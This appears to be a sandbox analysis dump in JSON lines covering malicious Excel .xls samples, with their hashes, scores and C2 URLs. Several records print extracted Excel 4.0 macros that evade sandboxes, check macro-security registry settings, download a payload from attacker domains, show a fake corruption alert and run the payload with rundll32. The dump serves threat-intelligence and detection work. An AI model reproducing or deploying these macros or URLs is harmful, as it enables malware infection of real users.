Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63aefe5abc1df53fd26ad66bfa2671b64d24906cd25273b53ecfd0753a539bc1"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63aefe5abc1df53fd26ad66bfa2671b64d24906cd25273b53ecfd0753a539bc1","filesize":152576,"md5":"84788b7f3e11b1d427a9f7d809de657a","sha1":"8168252b6e6b4fb4eeb5ca8c58eb7584037869ed","sha256":"63aefe5abc1df53fd26ad66bfa2671b64d24906cd25273b53ecfd0753a539bc1","sha512":"6ff73fd7a1c426b553c8b0966e345b4bcc02522d5487a0fea0ca41c2ded80c6350727841542183cca0cd5c073a6fd8f73d8f0c0d1fc504b8109dae38a7396691","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63aefe5abc1df53fd26ad66bfa2671b64d24906cd25273b53ecfd0753a539bc1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NaJ76TV60S\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63b146f4262f1f08568e3728ef519d01650657151df5a0aa2daf4b01e7a6a093"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63b146f4262f1f08568e3728ef519d01650657151df5a0aa2daf4b01e7a6a093","filesize":109568,"md5":"0b46bfb7704b0444853698f4d4e72993","sha1":"49fc7b2b5df7d5a936363ce33098851c44c61911","sha256":"63b146f4262f1f08568e3728ef519d01650657151df5a0aa2daf4b01e7a6a093","sha512":"6576c24e2831d51fc21d99fbb6dc86523dd942c03f1f31ca9c4bfe2839a0e8b5c7fe328dc98b910ea384a1d5fd983c38f96730b38b69be4c6e269d23d2877ef1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63b146f4262f1f08568e3728ef519d01650657151df5a0aa2daf4b01e7a6a093.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"G2tbxaKESq\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63ba453abeab5e4f50dea0c313ead38defc6988ccf18530a81187e593aa7fb1b"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63ba453abeab5e4f50dea0c313ead38defc6988ccf18530a81187e593aa7fb1b","filesize":206336,"md5":"d5a04d2ebed9ec4277269b90c924a6ee","sha1":"610c6db25c9ff557d988c731d07dae60555ea461","sha256":"63ba453abeab5e4f50dea0c313ead38defc6988ccf18530a81187e593aa7fb1b","sha512":"7a1f85dda0e974d26b54cea691cb20c84aea24670b2ae4f637d59baaa78c14c9c4a0aad1d125d6dd8930d04c0161ce89a2387df35b0d23c2b53fd9240dd9af44","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63ba453abeab5e4f50dea0c313ead38defc6988ccf18530a81187e593aa7fb1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H05MNMLoUJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63bc8152d23e59c211ac6cc824c72402426120607af2c1ce6e45fd1c128ebed1"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63bc8152d23e59c211ac6cc824c72402426120607af2c1ce6e45fd1c128ebed1","filesize":185344,"md5":"ba0112a9f65ee298b07b497abbc905da","sha1":"beae5aa722a50cebc4cb7bd3cb586791f97f155d","sha256":"63bc8152d23e59c211ac6cc824c72402426120607af2c1ce6e45fd1c128ebed1","sha512":"62558cca57b0311aa80ac197dca780f853065a2482597f7791f0e4c5a01c95dc71d8da50690e5b642e2ca7801bdd5a9baf874660382a8ac2a0e4e1764f4e1f9c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63bc8152d23e59c211ac6cc824c72402426120607af2c1ce6e45fd1c128ebed1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63d6efc2af48bd171e37b1d31f6b9b74d34e5f988c619acc782f909bca89fe67"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63d6efc2af48bd171e37b1d31f6b9b74d34e5f988c619acc782f909bca89fe67","filesize":209920,"md5":"e560d98f894d23d471eecf78c2e9040c","sha1":"5d8fa3331a42761671c1b5e47651eb21736ec2e2","sha256":"63d6efc2af48bd171e37b1d31f6b9b74d34e5f988c619acc782f909bca89fe67","sha512":"98713fa60c8427463fbfd1cfacecdb3f658e81e3c39c4f59e18364cbaee190f7424177e32866db25f4bcfa27b1f9f0f8bf9361ef33211749bf242fb13dd66d73","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63d6efc2af48bd171e37b1d31f6b9b74d34e5f988c619acc782f909bca89fe67.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"506nIv6Zxr\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63d99b029fea6520da7cd4253c1c71fd1388e569647e01224c2b49c6e0fe32cd"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"63d99b029fea6520da7cd4253c1c71fd1388e569647e01224c2b49c6e0fe32cd","filesize":185344,"md5":"6dfd0477f345a818554216f3461afcf1","sha1":"48f25863a0e722f0e1abf47732af57a0deddc1ce","sha256":"63d99b029fea6520da7cd4253c1c71fd1388e569647e01224c2b49c6e0fe32cd","sha512":"a3e83d14038dc2f652479dd81cced9ba95050f9c4552545214d26a843240561881e591b86d32f439dd09638dabb60ea9ff3afbfc2765bf28b019b683cd00a202","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63d99b029fea6520da7cd4253c1c71fd1388e569647e01224c2b49c6e0fe32cd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63f33d5f80c424a2115cbaafa9e90e55e5bd0140cd1bf0783b2949799c3c226e"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"63f33d5f80c424a2115cbaafa9e90e55e5bd0140cd1bf0783b2949799c3c226e","filesize":167936,"md5":"2930a285d3dd4945291d5af85776ed3b","sha1":"0b7fee9f5cb36c787d442b5f52ae79f76264bc64","sha256":"63f33d5f80c424a2115cbaafa9e90e55e5bd0140cd1bf0783b2949799c3c226e","sha512":"0d2e84193e7c79dd9096a46617dcf49969febd8f857a9144ac00a90a7cd2e431e3058d2bb9dc11f2d360682bc1345876e83810cbfdb41f00f92a3b9a681f777b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63f33d5f80c424a2115cbaafa9e90e55e5bd0140cd1bf0783b2949799c3c226e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CIBE0jvhcC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63fb397b1830507b845b8bb4fd4a3deb65b80c368f40cfbf1220e8937c1fe24e"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"63fb397b1830507b845b8bb4fd4a3deb65b80c368f40cfbf1220e8937c1fe24e","filesize":160768,"md5":"8194ffd184ef5e8d1a356b780285f8bc","sha1":"e0713e5caaf3c737ceb0ff71fa8dbb9ec3da97a6","sha256":"63fb397b1830507b845b8bb4fd4a3deb65b80c368f40cfbf1220e8937c1fe24e","sha512":"270a6497f68c0016891fc66ad1c7e01dfc59b9946f53742b197ae40fe25fd3f1270f982d99de4c68b823fcff34a86fc14d494cab39e50cd70aa73f954c57dab4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63fb397b1830507b845b8bb4fd4a3deb65b80c368f40cfbf1220e8937c1fe24e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BckwWpNmFp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6401f2f5d49ad64ed9d321f093e52d0c70dc4711e92e8510fa97ee31ad32a3dc"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"6401f2f5d49ad64ed9d321f093e52d0c70dc4711e92e8510fa97ee31ad32a3dc","filesize":142848,"md5":"ef86474032ec8c4645882378d45a10c8","sha1":"25bf1a2751b36d795f4d1d58bfa554acbf542f95","sha256":"6401f2f5d49ad64ed9d321f093e52d0c70dc4711e92e8510fa97ee31ad32a3dc","sha512":"be09cefad1fb8a1925b13b774aac0d65ba8befa8f344effc702618c06f252a236e864b4cf545665df4007dbd01abacdf0c7e4f6d4dfda29d0fc72d2438a9480c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6401f2f5d49ad64ed9d321f093e52d0c70dc4711e92e8510fa97ee31ad32a3dc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"mdyE1aIz0Q\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6405ac1648c484e7fcc2136f9dfd3007af91bedd466269d6546965490ee6702d"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"6405ac1648c484e7fcc2136f9dfd3007af91bedd466269d6546965490ee6702d","filesize":226304,"md5":"dd7e03249717eb91ad739ce905931179","sha1":"e1301c2d5b1236eb17915c8ca5c8afd1af413e2e","sha256":"6405ac1648c484e7fcc2136f9dfd3007af91bedd466269d6546965490ee6702d","sha512":"714b2af70daf0d01455a2be893b01471e8c442d13d21f8c93ea43bc3a30be3f74f475473cf045da670440733048cdfbf9abe222c4e3ef532df809bb8047f4845","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6405ac1648c484e7fcc2136f9dfd3007af91bedd466269d6546965490ee6702d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CJ0jomIrkU\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64295b430111b064be3aaffa725115369e3671e137004c0a3a281eca6bd94da1"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"64295b430111b064be3aaffa725115369e3671e137004c0a3a281eca6bd94da1","filesize":219136,"md5":"6ee4c871bef4f77aa49fb55ff401d436","sha1":"57ffe64da1d14825f3c19c8da016f64a31bc7d64","sha256":"64295b430111b064be3aaffa725115369e3671e137004c0a3a281eca6bd94da1","sha512":"67ad7df7fc313031694ec2378850dceed96aef0cb8f9568a81c0822e8a9eeecd5fe527d0a032d3657997d7d0caf850c4840bebed9db67302d1a1f5bc12479d6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64295b430111b064be3aaffa725115369e3671e137004c0a3a281eca6bd94da1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"I1GdSFZDbU\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"642dee4438cf9649f02a5320c2abbcea1c49b1a50fa2c2d0ace770b2b81882a1"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"642dee4438cf9649f02a5320c2abbcea1c49b1a50fa2c2d0ace770b2b81882a1","filesize":147968,"md5":"7ed79ed7ef63db079e4155a6c762b2c6","sha1":"8b184751d53d28562abf3941e7e3466d6cb789dc","sha256":"642dee4438cf9649f02a5320c2abbcea1c49b1a50fa2c2d0ace770b2b81882a1","sha512":"d592ca110888a0c6822d6d304ef0089443a0efb2cf6def2ab0b2a65ace1535f77951edecbdc10e942a61bc3c89d86865e62762c0510471bdd28207a43e198156","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"642dee4438cf9649f02a5320c2abbcea1c49b1a50fa2c2d0ace770b2b81882a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"GDrOakLrnz\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64389a2991bacc84be6d37e4439511758d464f64e583d6883088f4c715f445f0"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"64389a2991bacc84be6d37e4439511758d464f64e583d6883088f4c715f445f0","filesize":112128,"md5":"5a1c984c098762e11af66b85bc20efdc","sha1":"7eaffe410a8ec22afb1fe9a3f952cf8bb0ac3321","sha256":"64389a2991bacc84be6d37e4439511758d464f64e583d6883088f4c715f445f0","sha512":"1955f5bc9ef8e34ce75083fa4b3a2b87f86e67a5b655b7f1406835fc97cca4c904708854a6e5cbfe015d355745900fc9c32a26ba2f90ab9128b89ad10839078b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64389a2991bacc84be6d37e4439511758d464f64e583d6883088f4c715f445f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"643d33908341602dec2ba34b005f20e808e4dcaca707407cd67ef3cbcb3293e5"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"643d33908341602dec2ba34b005f20e808e4dcaca707407cd67ef3cbcb3293e5","filesize":206336,"md5":"d4ba5dc70a3adabaf1119e51ce7cd66d","sha1":"5212c0df319390b28f4d9b19fe9cda075a32980c","sha256":"643d33908341602dec2ba34b005f20e808e4dcaca707407cd67ef3cbcb3293e5","sha512":"0f6e05ab96bf700dc427d7c7d0ea09b523beaf4c02180b1772514593122be38cad8e26c63767ea62a7f39b6d2448bafe54e81990e1dbd2af7032528040341375","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"643d33908341602dec2ba34b005f20e808e4dcaca707407cd67ef3cbcb3293e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o2hRxsl4w5\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64478d2f06992f2b3342b1a828a9e1967ea79c8e1a07f0b34ee1569ae6d874f9"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"64478d2f06992f2b3342b1a828a9e1967ea79c8e1a07f0b34ee1569ae6d874f9","filesize":185344,"md5":"df2641c96f4b5137a3da62b929993b74","sha1":"162945d65b03dd2bb60907734a40164668b3d191","sha256":"64478d2f06992f2b3342b1a828a9e1967ea79c8e1a07f0b34ee1569ae6d874f9","sha512":"b1fa02b34da53523796d6be3334fd97025a40f890fbe1fa94498312294c2c4695c78e9ade46de4ca037de95394438560686be22fe9dee8177512e053786946ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64478d2f06992f2b3342b1a828a9e1967ea79c8e1a07f0b34ee1569ae6d874f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
